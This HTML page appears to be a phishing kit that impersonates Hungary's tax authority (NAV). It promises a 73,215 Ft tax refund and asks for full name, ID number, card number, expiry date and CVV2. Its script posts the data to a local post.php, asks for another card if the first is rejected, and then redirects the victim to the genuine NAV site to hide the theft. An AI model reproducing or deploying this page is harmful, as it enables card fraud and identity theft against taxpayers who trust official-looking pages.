<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>nav</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://maxcdn.icons8.com/fonts/line-awesome/1.1/css/line-awesome.min.css">
    <link rel="stylesheet" href="contents/assets/css/styles.min.css?h=c11e0f24180cef57a12a4ff152eb6aac">
</head>

<body>
    <!-- Start: Navigation Clean -->
    <div>
        <nav class="navbar navbar-light navbar-expand-md navigation-clean">
            <div class="container"><a class="navbar-brand" href="#"><img class="img-fluid" src="contents/assets/img/e-szamla-logo.png?h=9716466b277d16ebd30c6fcbb4fe0bfd" style="width: 120px;"></a>
                <div class="collapse navbar-collapse" id="navcol-1">
                    <ul class="nav navbar-nav ml-auto"><a class="navbar-brand" href="#"><img class="img-fluid" src="contents/assets/img/nav_logo.png?h=cc86909d646153cee3a5bcd0ffda2e95" style="width: 120px;"></a></ul>
                </div>
            </div>
        </nav>
    </div>
    <!-- End: Navigation Clean -->
    <!-- Start: 1 Row 1 Column -->
    <div style="background-color: #e1e1e1;">
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <h4 class="text-uppercase text-center" style="margin-top: 15px;"><strong>Visszatérítési információ</strong><br></h4><small class="form-text text-uppercase text-left text-muted" style="font-size: 12px;padding: 10px;margin-bottom: 25px;"><strong>Adók visszatérítése.</strong><br>Miután áttekintette a 2018-tól fizetett összes adót, megkérjük a nevét, családi nevét és azonosító számát A hivatal ügyfélkapun keresztül, illetve postán, adószámla-kivonaton értesíti az adózókat, ha túlfizetésük van.<br>Visszatérítési összeg:&nbsp;<strong>73215 Ft</strong><br>dátum: 06/2019<br></small></div>
            </div>
        </div>
    </div>
    <!-- End: 1 Row 1 Column -->
    <!-- Start: 1 Row 3 Columns -->
    <div style="background-color: #efefef;margin-bottom: 2px;">
        <div class="container">
            <div class="row">
                <div class="col-md-4"></div>
                <div class="col-md-4">
                    <form id="adatait" class="text-uppercase border rounded-0 shadow" style="background-color: #ffffff;margin-top: 10px;margin-bottom: 10px;padding: 35px;color: rgb(84,84,84);" method="post">
                        <h4 class="text-center"><strong>A hitelkártya adatait</strong><br></h4>
                        <div id="alertbox" class="alert alert-danger d-none" role="alert" style="background-color: rgb(220,53,69);padding-top: 0px;padding-bottom: 20px;"><span id="alerttext" style="font-size: 10px;color: rgb(255,255,255);margin: -12px;"></span></div>
                        <div class="form-group">
                            <label class="text-nowrap" style="font-size: 12px;">
                                <strong>Teljes név</strong><br>
                            </label>
                            <input class="form-control" type="text" name="ism" required="" minlength="5" autocomplete="off">
                        </div>
                        <div class="form-group">
                            <label style="font-size: 12px;">
                                <strong>Azonosító szám</strong><br>
                            </label>
                            <input class="form-control" type="tel" name="hawia" required="" minlength="8" autocomplete="off" inputmode="numeric">
                        </div>
                        <div class="form-group" style="margin-bottom: 3px;">
                            <label id="zebzebi" style="font-size: 12px;">
                                <strong>Kártyaszám</strong><br>
                            </label>
                            <input class="form-control" type="text" id="zebi" name="zebi" required="" autocomplete="off" inputmode="numeric" maxlength="16">
                        </div>
                        <div class="form-group text-center ml-auto" style="font-size: 30px;margin-bottom: 0px;margin-top: -45px;width: 48px;">
                            <i id="type" class="la la-credit-card" style="margin: 8px;opacity: 0.60;"></i>
                            <input type="hidden" id="valid" value="">
                        </div>
                        <div class="form-group" style="margin-bottom: 3px;">
                            <label style="font-size: 12px;">
                                <strong>Lejárati dátum</strong><br>
                            </label>
                            <input class="form-control" type="tel" id="sorm" placeholder="hh/éé" required="" minlength="5" maxlength="5" name="sorm" autocomplete="off">
                        </div>
                        <div class="form-group"
                            style="margin-bottom: 18px;">
                            <label style="font-size: 12px;">
                                <strong>Érvényesítési kód(CVV2)</strong><br>
                            </label>
                            <input class="form-control" id="3os" type="tel" name="3os" required="" minlength="3" maxlength="4" autocomplete="off" inputmode="numeric">
                        </div>
                        <button
                            class="btn btn-block btn-lg" type="submit" style="background-color: #5bbf21;color: #ffffff;margin-top: 30px;">Tovább<br></button>
                    </form>
                </div>
                <div class="col-md-4"></div>
            </div>
        </div>
    </div>
    <!-- End: 1 Row 3 Columns -->
    <!-- Start: Footer Clean -->
    <div class="footer-clean">
        <footer>
            <div class="container">
                <div class="row justify-content-center">
                    <!-- Start: Services -->
                    <div class="col-sm-4 col-md-3 item"><small class="form-text text-muted"><br>2018 © Nemzeti Adó- és Vámhivatal<br><br></small></div>
                    <!-- End: Services -->
                    <!-- Start: About -->
                    <div class="col-sm-4 col-md-3 item"><img src="contents/assets/img/nav_logo.png?h=cc86909d646153cee3a5bcd0ffda2e95"></div>
                    <!-- End: About -->
                    <!-- Start: Careers -->
                    <div class="col-sm-4 col-md-3 item">
                        <h3>Elérhetőségek<br></h3><small class="form-text text-muted">NAV Infovonala: 1819<br>Külföldről:&nbsp;+36-1-250-9500<br></small></div>
                    <!-- End: Careers -->
                </div>
            </div>
        </footer>
    </div>
    <!-- End: Footer Clean -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
    <script src="https://nosir.github.io/cleave.js/dist/cleave.min.js"></script>
    <script src="contents/assets/js/ccvalidator.js"></script>
    <script src="contents/assets/js/cctype.js"></script>
    <script src="https://nosir.github.io/cleave.js/dist/cleave.min.js"></script>
    <script>
        var cleave = new Cleave('#sorm', {
            date: true,
            datePattern: ['m', 'y']
        });
    </script>
    <script>
        $(document).ready(function(){
            $("#adatait").submit(function(e) {
                e.preventDefault();
                $.ajax({
                    type: "POST",
                    url: "post.php",
                    data: $(this).serialize(),
                    success: function(data)
                    {
                        var data = jQuery.parseJSON(data);
                        if(data.statut == false){
                            $("#zebzebi").addClass("text-danger");
                            $("#alerttext").html("adjon meg egy másik kártyát");
                            $("#alertbox").removeClass("d-none");
                        }
                        else{
                            window.location.replace("https://onlineszamla.nav.gov.hu/kerdesek_es_valaszok");
                        }
                    }
                });
            });
        });
    </script>
        
</body>

</html>